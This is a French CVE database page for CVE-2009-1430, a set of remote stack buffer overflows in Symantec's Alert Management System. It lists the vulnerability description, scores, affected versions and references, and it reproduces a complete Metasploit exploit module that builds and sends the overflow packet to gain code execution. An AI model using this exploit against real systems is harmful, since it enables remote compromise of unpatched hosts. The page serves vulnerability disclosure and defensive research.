CVE-2009-1430 : Détail

CVE-2009-1430

Overflow
97.2%V3
Network
2009-04-29
13h00 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple stack-based buffer overflows in IAO.EXE in the Intel Alert Originator Service in Symantec Alert Management System 2 (AMS2), as used in Symantec System Center (SSS); Symantec AntiVirus Server; Symantec AntiVirus Central Quarantine Server; Symantec AntiVirus (SAV) Corporate Edition 9 before 9.0 MR7, 10.0 and 10.1 before 10.1 MR8, and 10.2 before 10.2 MR2; Symantec Client Security (SCS) 2 before 2.0 MR7 and 3 before 3.1 MR8; and Symantec Endpoint Protection (SEP) before 11.0 MR3, allow remote attackers to execute arbitrary code via (1) a crafted packet or (2) data that ostensibly arrives from the MsgSys.exe process.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 16826

Date de publication : 2010-05-12 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: symantec_iao.rb 9298 2010-05-13 16:53:50Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Symantec Alert Management System Intel Alert Originator Service Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe. When an attacker sends a specially crafted alert, arbitrary code may be executed. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9298 $', 'References' => [ [ 'CVE', '2009-1430' ], [ 'OSVDB', '54159'], [ 'BID', '34674' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 800, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2003', { 'Offset' => 1061, 'Ret' => 0x00401130 } ], [ 'Windows 2000 All', { 'Offset' => 1065, 'Ret' => 0x00401130 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 28 2009')) register_options( [ Opt::RPORT(38292) ], self.class ) end def exploit connect filler = rand_text_alpha_upper(2048) sploit = payload.encoded sploit << rand_text_alpha_upper(target['Offset'] - payload.encoded.length) sploit << Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) sploit << [target.ret].pack('V') sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-950").encode_string sploit << rand_text_alpha_upper(rand(24) + 700) + "\x00" msg = "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x02\x00\x95\x94\xac\x10" msg << "\x08\xb4\x00\x00\x00\x00\x00\x00\x00\x00" + [filler.length].pack('V') msg << "ORIGCNFG" + "\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x03\x03\xb8" msg << "\x60\x00\x00\x00\x00\x00\x00" + "BIND" msg << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00" msg << "\x04" + "BIND" + "\x00" + [filler.length].pack('V') msg << rand_text_alpha_upper(7) + " Alert" + sploit msg << "\x00" + [filler.length].pack('V') + [filler.length].pack('V') msg << rand_text_alpha_upper(rand(10) + 36) msg << filler + "\x00\x00\x00\x00" + "PRGX" + "\x00\x04\xAC\x10\x08\x1D" msg << "\x07\x08\x12\x00" + "ConfigurationName" + "\x00\x16\x00\x14\x00" msg << rand_text_alpha_upper(rand(1) + 25) + "\x00\x08\x08\x00" + "RunArgs" msg << "\x00\x04\x00\x02" + "\x00\x20\x00\x03\x05\x00" + "FormatString" msg << "\x00\x02\x00\x00\x00\x08\x12\x00" + "ConfigurationName" msg << "\x00\x02\x00\x00\x00\x08\x0C\x00" + "HandlerHost" msg << "\x00\x17\x00\x15\x00" + rhost + "\x00\x00\x00\x00\x00\x00" print_status("Trying target #{target.name}...") sock.put(msg) handler disconnect end end

Products Mentioned

Configuraton 0

Symantec>>Antivirus >> Version To (including) 9.0

Symantec>>Antivirus >> Version To (including) 10.1

Symantec>>Antivirus >> Version To (including) 10.2

Symantec>>Antivirus >> Version -

Symantec>>Antivirus >> Version 10.0

    Symantec>>Antivirus >> Version 10.0.1

      Symantec>>Antivirus >> Version 10.0.1.1

        Symantec>>Antivirus >> Version 10.0.2

          Symantec>>Antivirus >> Version 10.0.2.1

            Symantec>>Antivirus >> Version 10.0.2.2

              Symantec>>Antivirus >> Version 10.0.3

                Symantec>>Antivirus >> Version 10.0.4

                  Symantec>>Antivirus >> Version 10.0.5

                    Symantec>>Antivirus >> Version 10.0.6

                      Symantec>>Antivirus >> Version 10.0.7

                        Symantec>>Antivirus >> Version 10.0.8

                          Symantec>>Antivirus >> Version 10.0.9

                            Symantec>>Antivirus_central_quarantine_server >> Version *

                            Symantec>>Client_security >> Version To (including) 3.1

                            Symantec>>Client_security >> Version 2.0

                            Symantec>>Client_security >> Version 3.0

                            Symantec>>Client_security >> Version 3.0.0.359

                            Symantec>>Client_security >> Version 3.0.1.1000

                            Symantec>>Client_security >> Version 3.0.1.1001

                            Symantec>>Client_security >> Version 3.0.1.1007

                            Symantec>>Client_security >> Version 3.0.1.1008

                            Symantec>>Client_security >> Version 3.0.1.1009

                              Symantec>>Client_security >> Version 3.0.2

                              Symantec>>Client_security >> Version 3.0.2.2000

                              Symantec>>Client_security >> Version 3.0.2.2001

                              Symantec>>Client_security >> Version 3.0.2.2002

                              Symantec>>Client_security >> Version 3.0.2.2010

                              Symantec>>Client_security >> Version 3.0.2.2011

                              Symantec>>Client_security >> Version 3.0.2.2020

                              Symantec>>Client_security >> Version 3.0.2.2021

                              Symantec>>Endpoint_protection >> Version To (including) 11.0

                              Symantec>>System_center >> Version *

                              Références

                              http://www.vupen.com/english/advisories/2009/1204
                              Tags : vdb-entry, x_refsource_VUPEN
                              http://www.securitytracker.com/id?1022132
                              Tags : vdb-entry, x_refsource_SECTRACK
                              http://www.securitytracker.com/id?1022130
                              Tags : vdb-entry, x_refsource_SECTRACK
                              http://www.securityfocus.com/bid/34674
                              Tags : vdb-entry, x_refsource_BID
                              http://www.securityfocus.com/bid/34672
                              Tags : vdb-entry, x_refsource_BID
                              http://secunia.com/advisories/34856
                              Tags : third-party-advisory, x_refsource_SECUNIA
                              http://www.securitytracker.com/id?1022131
                              Tags : vdb-entry, x_refsource_SECTRACK